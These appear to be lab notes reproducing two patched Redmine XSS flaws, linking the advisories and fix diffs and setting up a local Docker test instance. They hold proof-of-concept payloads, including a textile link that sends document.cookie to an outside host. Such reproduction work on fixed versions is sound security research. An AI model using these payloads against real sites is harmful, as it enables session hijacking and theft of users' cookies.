Advisories: https://www.redmine.org/projects/redmine/wiki/Security_Advisories
Let's find a POC for the following vulns:
- Persistent XSS vulnerabilities in textile inline links (#32934)
- XSS vulnerability due to missing back_url validation (#32850)
Both issues were fixed in 4.1.1 and 4.0.7.
Checking the diff between 4.0.6 and 4.0.7:
https://github.com/redmine/redmine/compare/4.0.6...4.0.7
Main fix for #32850 is here: https://github.com/redmine/redmine/compare/4.0.6...4.0.7#diff-5f3fc5e3977d242572aa1d08551f5eb557de0ccaff30370838ee9df5386ea0daR1301 Main fix for #32934 is here: https://github.com/redmine/redmine/compare/4.0.6...4.0.7#diff-7fd35a152b4d6f80a5c756100ef0ab7435852c04a2c473e9d8d0b016203b5a33R853
POC for #32850: http://localhost:8080/projects/test/time_entries/new?back_url=javascript:alert(1) then click on cancel (tested on 4.0.6) POC for #32934:
!nope.com(Click Me)!:javascript:document.location='example.com?cookie='+document.cookie)
https://www.redmine.org/projects/redmine/wiki/RedmineTextFormattingMarkdown
FYI: https://plan.io/redmine-security-scanner/
There is an official Docker image for Redmine: https://hub.docker.com/_/redmine
I used the following stack:
version: '3.1'
services:
redmine:
image: redmine:4.0.6
restart: always
ports:
- 8080:3000
environment:
REDMINE_DB_MYSQL: db
REDMINE_DB_PASSWORD: example
REDMINE_SECRET_KEY_BASE: supersecretkey
db:
image: mysql:5.7
restart: always
environment:
MYSQL_ROOT_PASSWORD: example
MYSQL_DATABASE: redmine
docker-compose -f stack.yml up